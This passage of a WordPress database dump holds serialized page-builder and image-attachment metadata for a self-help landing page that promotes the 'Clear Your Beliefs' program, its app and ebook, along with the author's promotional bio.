More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(964, 1482, '_wp_attached_file', '2014/10/download.png'),
(965, 1482, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:89;s:6:"height";i:87;s:4:"file";s:20:"2014/10/download.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(966, 1483, '_wp_attached_file', '2014/10/btn_07.png'),
(967, 1483, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:225;s:6:"height";i:57;s:4:"file";s:18:"2014/10/btn_07.png";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"btn_07-150x57.png";s:5:"width";i:150;s:6:"height";i:57;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"btn_07-220x57.png";s:5:"width";i:220;s:6:"height";i:57;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:17:"btn_07-170x57.png";s:5:"width";i:170;s:6:"height";i:57;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(968, 1484, '_wp_attached_file', '2014/10/btn_09.png'),
(969, 1484, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:225;s:6:"height";i:59;s:4:"file";s:18:"2014/10/btn_09.png";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"btn_09-150x59.png";s:5:"width";i:150;s:6:"height";i:59;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"btn_09-220x59.png";s:5:"width";i:220;s:6:"height";i:59;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:17:"btn_09-170x59.png";s:5:"width";i:170;s:6:"height";i:59;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(970, 1485, '_wp_attached_file', '2014/10/btn_10.png'),
(971, 1485, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:225;s:6:"height";i:60;s:4:"file";s:18:"2014/10/btn_10.png";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"btn_10-150x60.png";s:5:"width";i:150;s:6:"height";i:60;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"btn_10-220x60.png";s:5:"width";i:220;s:6:"height";i:60;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:17:"btn_10-170x60.png";s:5:"width";i:170;s:6:"height";i:60;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(972, 1486, '_wp_attached_file', '2014/10/btn_11.png'),
(973, 1486, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:225;s:6:"height";i:60;s:4:"file";s:18:"2014/10/btn_11.png";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"btn_11-150x60.png";s:5:"width";i:150;s:6:"height";i:60;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"btn_11-220x60.png";s:5:"width";i:220;s:6:"height";i:60;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:17:"btn_11-170x60.png";s:5:"width";i:170;s:6:"height";i:60;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(975, 1488, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:425:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:615:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(974, 1487, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:425:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:695:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the</strong></p><p style="text-align: center;"><strong><em>CLEAR YOUR BELIEFS</em></strong></p><p style="text-align: center;"><strong> Program</strong></p><p style="text-align: center;"><strong> </strong><strong>Clear Limiting and Negative Beliefs Permanently. </strong><strong>Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</strong></p><p><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2517:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p>Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><strong>Click HERE to Learn More</strong></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(976, 1489, '_wp_attached_file', '2014/10/btn_03.png'),
(977, 1489, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:510;s:6:"height";i:90;s:4:"file";s:18:"2014/10/btn_03.png";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"btn_03-150x90.png";s:5:"width";i:150;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:17:"btn_03-300x52.png";s:5:"width";i:300;s:6:"height";i:52;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"btn_03-220x90.png";s:5:"width";i:220;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:17:"btn_03-400x90.png";s:5:"width";i:400;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:17:"btn_03-170x90.png";s:5:"width";i:170;s:6:"height";i:90;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(978, 1490, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:425:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– 